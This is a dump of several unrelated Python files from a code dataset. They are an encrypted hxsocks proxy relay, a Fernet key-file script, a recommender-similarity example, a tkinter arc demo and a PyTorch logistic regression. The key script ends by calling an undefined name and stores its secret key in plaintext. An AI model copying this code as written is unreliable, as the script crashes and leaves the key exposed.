                        data = cipher.decrypt(ct)
                        pad_len = ord(data[0])
                        cmd = ord(data[-1])
                        if 0 < pad_len < 8:
                            # fake chunk, drop
                            if pad_len == 1 and writeable:
                                # pad_len 1 requests a fake chunk in return
                                _data = chr(2) + b'\x00' * random.randint(1024, 8196)
                                ct = cipher.encrypt(_data)
                                _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                                local.sendall(_data)
                        else:
                            data = data[1:0-pad_len] if pad_len else data[1:]
                            if data:
                                remote.sendall(data)
                            else:
                                # empty payload = client finished sending;
                                # last byte says whether to close hard
                                logging.debug('client close, gracefully')
                                if cmd:
                                    remote.close()
                                else:
                                    remote.shutdown(socket.SHUT_WR)
                                fds.remove(local)
                                readable = 0
                if remote in ins:
                    data = remote.recv(self.bufsize)
                    if not data:
                        writeable = 0
                        fds.remove(remote)
                        # pad short sessions with a fake chunk half the time
                        if total_send < 8196 and random.random() < 0.5:
                            _data = chr(2) + b'\x00' * random.randint(1024, 8196)
                            ct = cipher.encrypt(_data)
                            _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                            local.sendall(_data)
                    # if writeable and readable and not closed and random.random() < 0.1:
                    #     # request fake chunk
                    #     _data = chr(1) + b'\x00' * random.randint(1024, 8196)
                    #     ct = cipher.encrypt(_data)
                    #     _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                    #     local.sendall(_data)
                    # note: also runs when data is empty, sending the
                    # padding-only chunk that signals remote EOF
                    total_send += len(data)
                    padding_len = random.randint(8, 255)
                    data = chr(padding_len) + data + b'\x00' * padding_len
                    ct = cipher.encrypt(data)
                    data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                    local.sendall(data)
                if closed:
                    break
        except socket.timeout:
            pass
        except (OSError, IOError) as e:
            if e.args[0] in (errno.EBADF,):
                return
            if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
                raise
        except Exception as e:
            logging.error(repr(e))
            logging.error(traceback.format_exc())
        finally:
            try:
                remote.close()
            except (OSError, IOError):
                pass
            self.connection.settimeout(600)
        return readable + writeable

    def ssforward_tcp(self, local, remote, cipher, timeout=60):
        """Relay a plain shadowsocks stream: decrypt client->remote,
        encrypt remote->client, until either side closes or times out."""
        try:
            while 1:
                ins, _, _ = select.select([local, remote], [], [], timeout)
                if not ins:
                    break
                if local in ins:
                    data = local.recv(self.bufsize)
                    if not data:
                        break
                    remote.sendall(cipher.decrypt(data))
                if remote in ins:
                    data = remote.recv(self.bufsize)
                    if not data:
                        break
                    local.sendall(cipher.encrypt(data))
        except socket.timeout:
            pass
        except (OSError, IOError) as e:
            if e.args[0] in (errno.EBADF,):
                return
            if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
                raise
        except Exception as e:
            logging.error(repr(e))
            logging.error(traceback.format_exc())
        finally:
            for sock in (remote, local):
                try:
                    sock.close()
                except (OSError, IOError):
                    pass

    def ssforward_tcp_ota(self, local, remote, cipher, timeout=60):
        """Relay a shadowsocks one-time-auth stream.

        Client chunks are [2-byte length][10-byte HMAC-SHA1][data]; the MAC
        key is the decipher IV plus the running chunk index.  Chunks that
        fail verification are dropped (logged) rather than forwarded.
        """
        try:
            while 1:
                ins, _, _ = select.select([local, remote], [], [], timeout)
                if not ins:
                    break
                if local in ins:
                    data_len = struct.unpack('>H', cipher.decrypt(self.rfile.read(2)))[0]
                    rmac = cipher.decrypt(self.rfile.read(10))
                    data = cipher.decrypt(self.rfile.read(data_len))
                    index = struct.pack('>I', self._ota_chunk_idx)
                    key = cipher.decipher_iv + index
                    mac = hmac.new(key, data, hashlib.sha1).digest()[:10]
                    if encrypt.compare_digest(rmac, mac):
                        self._ota_chunk_idx += 1
                        remote.sendall(data)
                    else:
                        logging.warning('OTA Failed')
                if remote in ins:
                    data = remote.recv(self.bufsize)
                    if not data:
                        break
                    local.sendall(cipher.encrypt(data))
        except socket.timeout:
            pass
        except (OSError, IOError) as e:
            if e.args[0] in (errno.EBADF,):
                return
            if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
                raise
        except Exception as e:
            logging.error(repr(e))
            logging.error(traceback.format_exc())
        finally:
            for sock in (remote, local):
                try:
                    sock.close()
                except (OSError, IOError):
                    pass

    def _request_is_loopback(self, req):
        """True when the target host resolves to a loopback address;
        resolution failures fall through and return None (treated as not
        loopback)."""
        try:
            return get_ip_address(req[0]).is_loopback
        except Exception:
            pass
def start_servers(config, forward):
    """Spin up one threaded HXSocksServer per server-info entry in *config*.

    A bad entry is logged and skipped so the remaining servers still start.
    """
    for entry in config:
        try:
            logging.info('starting server: %s' % entry)
            server = HXSocksServer(entry, forward, HXSocksHandler)
            worker = threading.Thread(target=server.serve_forever)
            worker.start()
        except Exception as e:
            logging.error('something wrong with config: %r' % e)
def main():
    """Entry point: configure logging, load/create the server certificate,
    read config.json (if present) and start the configured servers."""
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)-8s %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
    hello = 'hxsocks-server %s' % __version__
    if gevent:
        hello += ' with gevent %s' % gevent.__version__
    print(hello)
    print('by v3aqb')
    global SERVER_CERT
    here = os.path.dirname(os.path.abspath(__file__))
    cert_path = os.path.join(here, 'cert.pem')
    try:
        SERVER_CERT = ECC(from_file=cert_path)
    except Exception:
        # bug fix: was a bare "except:", which also swallowed SystemExit
        # and KeyboardInterrupt
        logging.warning('server cert not found, creating...')
        SERVER_CERT = ECC(key_len=32)
        SERVER_CERT.save(cert_path)
    servers = ['hxs://0.0.0.0:9000']
    forward = []
    config_path = os.path.join(here, 'config.json')
    if os.path.exists(config_path):
        global USER_PASS
        # bug fix: the config file handle was never closed
        with open(config_path) as f:
            d = json.loads(f.read())
        USER_PASS = d['users']
        servers = d['servers']
        forward = d.get('forward', [])
    # consistency: reuse start_servers instead of duplicating its loop,
    # which also means one bad server entry no longer aborts the rest
    start_servers(servers, forward)
if __name__ == '__main__':
    try:
        main()
    except socket.error as e:
        # bind/listen failures end up here; report instead of tracebacking
        logging.error(e)
    except KeyboardInterrupt:
        # Ctrl-C is a normal shutdown, not an error
        sys.exit(0)
| hadidonk/hxsocks | hxsserver.py | hxsserver.py | py | 23,258 | python | en | code | 0 | github-code | 36 |
from cryptography.fernet import Fernet
import os
from pathlib import Path

# Directory and settings file that hold the generated application secret.
default_path = Path("/home/Diode/Dicot/VisionIOT/main")
default_path.mkdir(parents=True, exist_ok=True)
filen = default_path / "app.dat"

# Bug fix: the file was previously truncated (open(..., 'w').close()) *before*
# being read back, so the preserved "content" was always empty and any
# existing settings were destroyed.  Read whatever is there without
# truncating.
content = filen.read_text() if filen.exists() else ""

k_ey = Fernet.generate_key()
# Bug fix: str() on a bytes key wrote the literal "b'...'" repr into the
# settings file; decode to store the raw base64 token instead.
filen.write_text(content + "\nsecretKey: " + k_ey.decode())
appsetting.close() | imdiode/PythonExper | home4.py | home4.py | py | 502 | python | en | code | 0 | github-code | 36 |
74552041385 |
def hr():
    """Print a horizontal rule of 20 box-drawing dashes."""
    rule = '─' * 20
    print(rule)
def l():
    """Print a blank line (a newline character plus print's own newline,
    i.e. two '\\n' in total, matching the original behavior)."""
    blank = '\n'
    print(blank)
def _():
    """Print a visual separator: blank line, horizontal rule, blank line."""
    for step in (l, hr, l):
        step()
def jaccard(v1, v2):
    """Similarity score: fraction of positions where both vectors are
    truthy, divided by len(v1), rounded to 2 decimals.

    NOTE(review): this divides by len(v1) rather than by the size of the
    union of nonzero positions, so it is not the textbook Jaccard index —
    behavior preserved as-is.
    """
    matches = sum(1 for i in range(len(v1)) if v1[i] and v2[i])
    return round(matches / len(v1), 2)
def subtractTheRowMean(vector):
    """Subtract the mean of the nonzero entries from every nonzero entry,
    mutating *vector* in place, and return the same list.  Zero entries
    are left untouched (they are treated as "no rating").

    Raises ZeroDivisionError when there are no nonzero entries (behavior
    preserved from the original).
    """
    nonzero_count = sum(1 for value in vector if value != 0)
    mean = sum(vector) / nonzero_count
    for idx, value in enumerate(vector):
        if value != 0:
            vector[idx] = value - mean
    return vector
def adjustedCosine(v1, v2):
    """Adjusted-cosine similarity: mean-center both vectors, then take
    their cosine similarity, rounded to 3 decimals."""
    import math
    v1 = subtractTheRowMean(v1)
    v2 = subtractTheRowMean(v2)
    # cosine = (v1 . v2) / (||v1|| * ||v2||)
    sumxy = sum(a * b for a, b in zip(v1, v2))
    sumxx = sum(a * a for a in v1)
    sumyy = sum(b * b for b in v2)
    # sqrt of the product (not product of sqrts) matches the original's
    # floating-point result exactly before rounding.
    return round(sumxy / math.sqrt(sumxx * sumyy), 3)
def predictiveFunction(k, sim, r):
    """Predict a rating as the similarity-weighted average of the k
    nearest neighbours' ratings.

    sim -- similarities of the neighbours (first k entries are used)
    r   -- the neighbours' ratings, aligned with sim
    Returns a float rounded first to 1 decimal, then to a whole number
    (the original's double rounding is preserved deliberately).
    """
    top_sim = sim[:k]
    top_r = r[:k]
    weighted_sum = sum(s * rating for s, rating in zip(top_sim, top_r))
    prediction = weighted_sum / sum(top_sim)
    prediction = round(prediction, 1)
    return round(prediction, 0)
"""
# jaccard similarity test
l()
print('random example:')
rankingX = [1,1,1,0,1]
rankingY = [1,0,1,1,1]
print('jaccard:', jaccard(rankingX, rankingY))
print('3/5:', 3/5)
l()
"""
# item-item collaborative filtering system
item1 = [3, 4, 3, 1]
item2 = [1, 3, 3, 5]
item3 = [2, 4, 1, 5]
item4 = [3, 3, 5, 2]
item5 = [3, 5, 4, 1]
l()
print('Πρόβλεψη με item-item collaborative filtering system')
print('adjusted cosine v1, v5:', adjustedCosine(item1,item5))
print('adjusted cosine v2, v5:', adjustedCosine(item2,item5))
print('adjusted cosine v3, v5:', adjustedCosine(item3,item5))
print('adjusted cosine v4, v5:', adjustedCosine(item4,item5))
k=2
sim = [adjustedCosine(item1,item5),adjustedCosine(item4,item5)]
r = [5,4]
print('Πρόβλεψη',predictiveFunction(k, sim, r))
l()
# user-user collaborative filtering system
user1 = [3, 1, 2, 3]
user2 = [4, 3, 4, 3]
user3 = [3, 3, 1, 5]
user4 = [1, 5, 5, 2]
alice = [5, 3, 4, 4]
l()
print('Πρόβλεψη με user-user collaborative filtering system')
print('adjusted cosine v1, alice:', adjustedCosine(user1,alice))
print('adjusted cosine v2, alice:', adjustedCosine(user2,alice))
print('adjusted cosine v3, alice:', adjustedCosine(user3,alice))
print('adjusted cosine v4, alice:', adjustedCosine(user4,alice))
k=2
sim = [adjustedCosine(user1,alice),adjustedCosine(user2,alice)]
r = [3,5]
print('Πρόβλεψη',predictiveFunction(k, sim, r))
l()
| Apostolos172/uom | s7/Information Retrieval and Search Engines/recommender/irTheoryExample.py | irTheoryExample.py | py | 3,271 | python | en | code | 0 | github-code | 36 |
11262269606 | from tkinter import *
root = Tk()
# Create a Canvas with a white background.
cv = Canvas(root, bg='white')
# Map each row index to an arc drawing style (tkinter constants).
d = {1: PIESLICE, 2: CHORD, 3: ARC}
for i in d:
    cv.create_arc(
        (10, 10 + 60 * i, 110, 110 + 60 * i),
        style=d[i],  # drawing style for this row
        start=30,  # starting angle in degrees
        extent=30  # angular extent (offset) in degrees
    )
cv.pack()
root.mainloop()
# The three styles draw a pie slice, a chord and a plain arc respectively.
36532411991 | #The code base on https://github.com/zergtant/pytorch-handbook
import torch # pytorch 实现
import torch.nn as nn
import numpy as np #处理矩阵运算
'''
1 logistic回归会在线性回归后再加一层logistic函数的调用,主要
用于二分类预测
2 使用UCI German Credit 数据集
german.data-numeric 是已经使用numpy 处理好的数值化数据,
可以直接numpy 调用
'''
# Step 1: load the numeric German Credit data (whitespace-separated matrix).
data=np.loadtxt("german.data-numeric")
# Step 2: standardise every feature column (all columns except the label).
n,l=data.shape # n samples, l columns (24 features + 1 label)
for i in range(l-1):
    meanVal=np.mean(data[:,i])
    # BUG FIX: the original computed np.std(data[:i]) - the first i ROWS of
    # the whole matrix (an empty slice, hence NaN, when i == 0) - instead of
    # the standard deviation of column i.
    stdVal=np.std(data[:,i])
    data[:,i]=(data[:,i]-meanVal)/stdVal
# Shuffle the rows so the train/test split below is random.
np.random.shuffle(data)
# Step 3: split - first 900 rows for training, last 100 for testing.
# Columns 0..l-2 are the 24 features; the last column is the label,
# shifted from {1, 2} to {0, 1}.
train_data=data[:900,:l-1]
train_lab=data[:900,l-1]-1
test_data=data[900:,:l-1]
test_lab=data[900:,l-1]-1
# Step 4: define the model.
class Logistic_Regression(nn.Module):
    """Logistic-regression classifier: one linear layer (24 -> 2) followed
    by an element-wise sigmoid.

    NOTE(review): the sigmoid output is later fed to CrossEntropyLoss,
    which normally expects raw logits - confirm this is intended.
    """

    def __init__(self):
        # Run nn.Module bookkeeping before registering sub-modules.
        super(Logistic_Regression, self).__init__()
        self.fc = nn.Linear(24, 2)  # 24 input features -> 2 class scores

    def forward(self, x):
        """Map a (batch, 24) float tensor to per-class sigmoid activations."""
        logits = self.fc(x)
        return torch.sigmoid(logits)
# Accuracy on the held-out test set.
def test(pred,lab):
    """Return the fraction of rows whose argmax class equals the label.

    pred -- (batch, classes) score tensor; lab -- (batch,) label tensor.
    """
    predicted_classes = pred.max(-1)[1]
    hits = (predicted_classes == lab).float()
    return torch.mean(hits)
# Step 5: model, loss and optimiser (hyper-parameters).
net=Logistic_Regression()
criterion=nn.CrossEntropyLoss() # NOTE(review): CrossEntropyLoss expects raw logits, but the net's forward applies sigmoid - confirm intended
optm=torch.optim.Adam(net.parameters()) # Adam optimiser over all model parameters
epochs=1100# number of training epochs
# Step 6: training loop.
for i in range(epochs):
    # Switch to training mode (enables gradient bookkeeping).
    net.train()
    # Convert the numpy arrays to torch tensors (re-done every epoch;
    # could be hoisted out of the loop).
    x=torch.from_numpy(train_data).float()
    y=torch.from_numpy(train_lab).long()
    y_hat=net(x) # forward pass on the training data
    loss=criterion(y_hat,y) # compute the loss
    optm.zero_grad() # clear gradients from the previous step
    loss.backward() # back-propagate
    optm.step() # apply the parameter update
    if (i+1)%100==0: # report progress every 100 epochs
        net.eval()
        test_in=torch.from_numpy(test_data).float()
        test_l=torch.from_numpy(test_lab).long()
        test_out=net(test_in)
        accu=test(test_out,test_l)
        print("Epoch:{},Loss:{:.4f},Accuracy:{:.2f}".format(i+1,loss.item(),accu))
| BrandonHoo/Deep-Learning-Practice-Project | Logistic_Regression_practice.py | Logistic_Regression_practice.py | py | 2,774 | python | zh | code | 1 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.